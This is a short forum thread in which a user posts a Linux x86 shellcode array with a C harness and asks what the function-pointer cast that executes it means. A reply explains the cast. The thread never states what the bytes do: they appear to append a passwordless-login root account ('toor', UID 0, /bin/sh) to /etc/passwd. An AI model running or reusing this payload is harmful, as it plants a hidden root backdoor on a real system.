shellcodeing help

[shan75]

char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x52\x68\x73\x73\x77"
"\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x41"
"\x04\x66\xba\x80\x01\x6a\x05\x58\xcd\x80\x89\xc3\x31\xc0\x50\x66"
"\x68\x68\x0a\x68\x69\x6e\x2f\x73\x68\x2f\x3a\x2f\x62\x68\x3a\x30"
"\x3a\x3a\x68\x48\x55\x3a\x30\x68\x72\x32\x69\x7a\x68\x44\x7a\x33"
"\x71\x68\x3a\x47\x66\x2e\x68\x74\x6f\x6f\x72\x89\xe1\x6a\x22\x5a"
"\xb0\x04\xcd\x80\x6a\x06\x58\xcd\x80";

int main()
{
printf("[*] Shellcode - length: %d\n", strlen(shellcode));
(*(void(*)())shellcode)();
return 0;
}

this is a shellcode.. but i cant understand (*(void(*)())shellcode)(); this line what is it actually mean funtion poiner or what?? please explain me..

thanx

[Gogeta70]

Well it's definitely a call to execute the shellcode, what confuses me the most is the pointer/dereference operator. So i can't really tell you for sure what that line does.

[shan75]

anyone else can help me??

[Lundis]

It casts the pointer to a function returning and taking no arguments and calls it. It's a bit clearer if you write it on multiple lines:

Code: Select all

int main()
{
	printf("[*] Shellcode - length: %d\n", strlen(shellcode));
	// cast the string to a function pointer
	void (*func)() = (void(*)())shellcode;
	//dereference the function pointer and call the function
	(*func)();
	return 0;
}

Derefencing it is optional (on gcc at least) and doesn't really make any sense to me.